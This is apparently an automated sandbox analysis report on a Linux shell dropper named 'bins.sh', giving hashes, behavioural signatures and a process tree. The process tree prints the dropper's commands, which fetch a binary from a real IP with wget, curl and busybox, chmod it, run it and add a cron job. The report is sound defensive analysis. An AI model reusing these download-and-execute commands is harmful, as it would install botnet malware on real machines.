Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
10-11-2024 01:22
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
f0f4868aeaf3ef472470cdf9c3196646
-
SHA1
4accc751d722b39cdca1ff7a5f366ee910897677
-
SHA256
6a7f9557ab00824cc2c3f3fe1db071a5efe8cc09bea4df9141d44938ecde8df9
-
SHA512
b9d9868fde0a47ba003643f56140c2d15341dc4f2472dd4da8e7c17fc4ac1404c7e1e30089741902a3c3b15fbfd716dae7aac15df4674541bce8b84e11b83332
-
SSDEEP
192:Ew8MZhcRhpyNdSai3L7Y6aszfLv+ocLSai3LY6aszfzJw8MZhENhpg:Ew8MZhc6CBvhHw8MZhEK
Malware Config
Signatures
-
Contacts a large (2193) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 1490 chmod -
Executes dropped EXE 1 IoCs
Processes:
wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681ioc pid process /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 1491 wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 -
Renames itself 1 IoCs
Processes:
wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681pid process 1492 wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.rKkEOF crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681description ioc process File opened for reading /proc/1653/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1677/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/173/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/950/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1543/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1544/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1619/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1633/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1662/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1700/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/34/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/82/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/175/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1263/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1594/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1659/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1706/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/29/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1106/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1508/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1645/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1697/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/413/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1550/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1567/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1695/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1532/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1592/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1691/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1114/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1634/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/202/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1641/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1665/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1686/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/159/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1572/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1651/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1599/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1660/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/98/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/161/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/446/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1500/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1556/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1597/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/596/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1531/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1607/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1678/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1705/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/160/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1481/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1579/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1612/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1643/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/8/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1061/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1118/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1542/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1655/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/25/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1152/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 File opened for reading /proc/1170/cmdline wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc process File opened for modification /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 wget File opened for modification /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 curl File opened for modification /tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1481
-
/bin/rm/bin/rm bins.sh2⤵PID:1482
-
/usr/bin/wgetwget http://216.126.231.240/bins/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh6812⤵
- Writes file to tmp directory
PID:1483 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh6812⤵
- Writes file to tmp directory
PID:1488 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh6812⤵
- Writes file to tmp directory
PID:1489 -
/bin/chmodchmod 777 wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh6812⤵
- File and Directory Permissions Modification
PID:1490 -
/tmp/wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh681./wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh6812⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1491 -
/bin/shsh -c "crontab -l"3⤵PID:1493
-
/usr/bin/crontabcrontab -l4⤵PID:1494
-
/bin/shsh -c "crontab -"3⤵PID:1495
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1496 -
/bin/rmrm wbTbgzmYogpF1wP9oFHBEpjvYkkfEjh6812⤵PID:1498
-
/usr/bin/wgetwget http://216.126.231.240/bins/KvH3UoksRRYPVQBB5h446C1JLpGoKMsui62⤵PID:1501
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
210B
MD5b8e2c71697b4674a560431b7dc0d297a
SHA1a8f39b9c051e60bc8e61bd77f5f7ee7d399666f3
SHA2560dd021a602b885e1ae9428737fddf12557d158b852233cd05a9df4d34e06dee9
SHA51251318746d51828297a3fa8ff320393ff8b6fedfa669c08a7f61e88c649d8a87d34acd029e968ecb4a7fdb9444c8d7eec1f7c81534972b0f09d0a29e1c45da25c